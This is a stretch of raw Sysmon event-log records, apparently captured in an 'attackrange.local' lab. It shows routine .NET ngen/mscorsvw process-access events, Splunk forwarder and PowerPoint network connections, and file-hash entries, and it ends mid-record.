14:58:52.091{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2C-607E-080F-00000000BB01}6512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000050601Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:49.765{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52542-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000050600Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:52.361{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E9AD19F3570F181A7DE0AFC9EA8E0ED,SHA256=7E5F3E87B2CA742E4E2BD1E3AB877A204B00525DF9304D17D19A6BBE581DF130,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050599Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:52.252{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=73FD2FCF671FF9C745AEFF33B64FCFD1,SHA256=D3912B597900208200E77FBC6C40F1DFE0BE0A433C00AEF50C847A8997170CCF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081095Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.966{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC2D-607E-280F-00000000BB01}6232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081094Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.966{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2D-607E-280F-00000000BB01}6232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081093Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.888{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2D-607E-270F-00000000BB01}6864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081092Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.888{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC2D-607E-270F-00000000BB01}6864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081091Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.888{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2D-607E-270F-00000000BB01}6864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081090Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.856{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2D-607E-260F-00000000BB01}4144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081089Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.841{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC2D-607E-260F-00000000BB01}4144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081088Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.841{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2D-607E-260F-00000000BB01}4144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000081087Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.631{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57608-false52.114.76.35-443https 354300x800000000000000081086Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.589{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57607-false104.76.200.41a104-76-200-41.deploy.static.akamaitechnologies.com443https 354300x800000000000000081085Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.582{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local61790- 354300x800000000000000081084Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.580{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53414- 10341000x800000000000000081083Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.809{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2D-607E-250F-00000000BB01}6084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081082Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.794{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC2D-607E-250F-00000000BB01}6084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081081Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.794{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2D-607E-250F-00000000BB01}6084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081080Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.763{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2D-607E-240F-00000000BB01}6540C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081079Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.747{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC2D-607E-240F-00000000BB01}6540C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081078Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.747{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2D-607E-240F-00000000BB01}6540C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081077Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.716{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2D-607E-230F-00000000BB01}4112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081076Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.700{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC2D-607E-230F-00000000BB01}4112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081075Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.700{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2D-607E-230F-00000000BB01}4112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081074Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.669{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2D-607E-220F-00000000BB01}6724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081073Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.653{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC2D-607E-220F-00000000BB01}6724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081072Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.653{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2D-607E-220F-00000000BB01}6724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\